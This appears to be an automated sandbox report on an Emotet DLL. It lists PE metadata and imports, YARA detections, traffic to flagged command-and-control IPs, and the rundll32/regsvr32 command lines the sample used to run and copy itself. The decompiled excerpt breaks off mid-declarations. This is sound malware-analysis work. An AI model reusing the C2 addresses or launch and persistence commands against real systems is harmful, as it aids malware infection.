mov dword ptr [ecx+08h], eax
dec eax
lea eax, dword ptr [00033EF8h]
dec eax
mov dword ptr [ecx], eax
dec eax
mov eax, ecx
ret
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033EADh]
dec eax
mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]

Rich Headers

Programming Language:

[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7cda0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cdf8	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x87000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x82000	0x192c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0x66c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7a410	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7a430	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x38000	0x370	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x36fd5	0x37000	False	0.38967507102272725	data	5.930785005703424	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x38000	0x4597a	0x45a00	False	0.670532007405745	data	6.275607964984237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x3394	0xc00	False	0.18294270833333334	DOS executable (block device driver \337-\231+])	2.573523630872546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x82000	0x192c	0x1a00	False	0.4794170673076923	data	5.1711441720039435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x84000	0xdc	0x200	False	0.244140625	Spectrum .TAP data "6 " - BASIC program	1.1531659578770692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gxfg	0x85000	0x1000	0x1000	False	0.44091796875	data	5.088628746947821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gehcont	0x86000	0xc	0x200	False	0.0390625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x87000	0x1e0	0x200	False	0.52734375	data	4.724728911998389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0x66c	0x800	False	0.537109375	data	4.9054360857170005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x87060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
USER32.dll	EndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
GDI32.dll	Polyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize
CRYPT32.dll	CryptStringToBinaryA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x180013f70

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5115.178.55.2249700802404304 11/13/22-16:54:45.127001	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49700	80	192.168.2.5	115.178.55.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 17:07:39.508845091 CET	49700	80	192.168.2.5	115.178.55.22
Nov 13, 2022 17:07:39.803035021 CET	80	49700	115.178.55.22	192.168.2.5
Nov 13, 2022 17:07:40.302999020 CET	49700	80	192.168.2.5	115.178.55.22
Nov 13, 2022 17:07:40.597121000 CET	80	49700	115.178.55.22	192.168.2.5
Nov 13, 2022 17:07:41.099987030 CET	49700	80	192.168.2.5	115.178.55.22
Nov 13, 2022 17:07:41.394001961 CET	80	49700	115.178.55.22	192.168.2.5
Nov 13, 2022 17:07:46.665694952 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:46.830019951 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:46.830213070 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:46.867500067 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:47.031560898 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:47.047235966 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:47.047276974 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:47.047348022 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:47.098460913 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:47.263509989 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:47.263540030 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:47.319065094 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:51.002027988 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:51.002115011 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:51.173521042 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:51.173543930 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:51.796541929 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:51.850743055 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:54.796240091 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:54.796309948 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:54.796484947 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:54.799426079 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:54.799518108 CET	49703	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 17:07:54.963973045 CET	8080	49703	172.105.115.71	192.168.2.5
Nov 13, 2022 17:07:54.964036942 CET	8080	49703	172.105.115.71	192.168.2.5

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll64.exePID: 4360, Parent PID: 3324

General

Target ID:	0
Start time:	17:06:53
Start date:	13/11/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll"
Imagebase:	0x7ff6242a0000
File size:	139776 bytes
MD5 hash:	C676FC0263EDD17D4CE7D644B8F3FCD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.317524653.0000020509D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5960, Parent PID: 4360

General

Target ID:	1
Start time:	17:06:54
Start date:	13/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1408, Parent PID: 4360

General

Target ID:	2
Start time:	17:06:54
Start date:	13/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1
Imagebase:	0x7ff627730000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4768, Parent PID: 4360

General

Target ID:	3
Start time:	17:06:54
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\En3ZIyuYdw.dll
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.314902232.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.315217709.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1648, Parent PID: 1408

General

Target ID:	4
Start time:	17:06:54
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1
Imagebase:	0x7ff678f60000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.314643058.000001F1B4D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312680060.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2256, Parent PID: 4360

General

Target ID:	5
Start time:	17:06:54
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\En3ZIyuYdw.dll,DllRegisterServer
Imagebase:	0x7ff678f60000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.312512000.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.313418088.000001F592EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2992, Parent PID: 2256

General

Target ID:	6
Start time:	17:06:59
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll"
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.699849743.0000000002750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1876, Parent PID: 1648

General

Target ID:	7
Start time:	17:06:59
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KkpTOJipNydtZ\ukztcGVtQBo.dll"
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5992, Parent PID: 4768

General

Target ID:	8
Start time:	17:06:59
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HVTkRBUydWHs\wOpoKzU.dll"
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6084, Parent PID: 4360

General

Target ID:	9
Start time:	17:07:01
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IASGzYkaksn\BFlBQr.dll"
Imagebase:	0x7ff7fcd70000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5768, Parent PID: 3324

General

Target ID:	12
Start time:	17:08:01
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.461600527.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.461398791.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1444, Parent PID: 5768

General

Target ID:	13
Start time:	17:08:08
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\QYzAfBQRbM\CtOPL.dll"
Imagebase:	0x7ff78fb10000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll64.exePID: 4360, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	3%
Signature Coverage:	10.3%
Total number of Nodes:	701
Total number of Limit Nodes:	11

Executed Functions

Function 00007FFA0AE73FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFA7FFA0AE73FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v657;
				char _v658;
				char _v659;
				char _v660;
				char _v661;
				char _v662;
				char _v663;
				char _v664;
				char _v665;
				char _v666;
				char _v667;
				char _v668;
				char _v669;
				char _v670;
				char _v671;
				char _v672;
				char _v673;
				char _v674;
				char _v675;
				char _v676;
				char _v677;
				char _v678;
				char _v679;
				char _v680;
				char _v681;
				char _v682;
				char _v683;
				char _v684;
				char _v685;
				char _v686;
				char _v687;
				char _v688;
				char _v689;
				char _v690;
				char _v691;
				char _v692;
				char _v693;
				char _v694;
				char _v695;
				char _v696;
				char _v697;
				char _v698;
				char _v699;
				char _v700;
				char _v701;
				char _v702;
				char _v703;
				char _v704;
				char _v705;
				char _v706;
				char _v707;
				char _v708;
				char _v709;
				char _v710;
				char _v711;
				char _v712;
				char _v713;
				char _v714;
				char _v715;
				char _v716;
				char _v717;
				char _v718;
				char _v719;
				char _v720;
				char _v721;
				char _v722;
				char _v723;
				char _v724;
				char _v725;
				char _v726;
				char _v727;
				char _v728;
				char _v729;
				char _v730;
				char _v731;
				char _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				char _v737;
				char _v738;
				char _v739;
				char _v740;
				char _v741;
				char _v742;
				char _v743;
				char _v744;
				char _v745;
				char _v746;
				char _v747;
				char _v748;
				char _v749;
				char _v750;
				char _v751;
				char _v752;
				char _v753;
				char _v754;
				char _v755;
				char _v756;
				char _v757;
				char _v758;
				char _v759;
				char _v760;
				char _v761;
				char _v762;
				char _v763;
				char _v764;
				char _v765;
				char _v766;
				char _v767;
				char _v768;
				char _v769;
				char _v770;
				char _v771;
				char _v772;
				char _v773;
				char _v774;
				char _v775;
				char _v776;
				char _v777;
				char _v778;
				char _v779;
				char _v780;
				char _v781;
				char _v782;
				char _v783;
				char _v784;
				char _v785;
				char _v786;
				char _v787;
				char _v788;
				char _v789;
				char _v790;
				char _v791;
				char _v792;
				char _v793;
				char _v794;
				char _v795;
				char _v796;
				char _v797;
				char _v798;
				char _v799;
				char _v800;
				char _v801;
				char _v802;
				char _v803;
				char _v804;
				char _v805;
				char _v806;
				char _v807;
				char _v808;
				char _v809;
				char _v810;
				char _v811;
				char _v812;
				char _v813;
				char _v814;
				char _v815;
				char _v816;
				char _v817;
				char _v818;
				char _v819;
				char _v820;
				char _v821;
				char _v822;
				char _v823;
				char _v824;
				char _v825;
				char _v826;
				char _v827;
				char _v828;
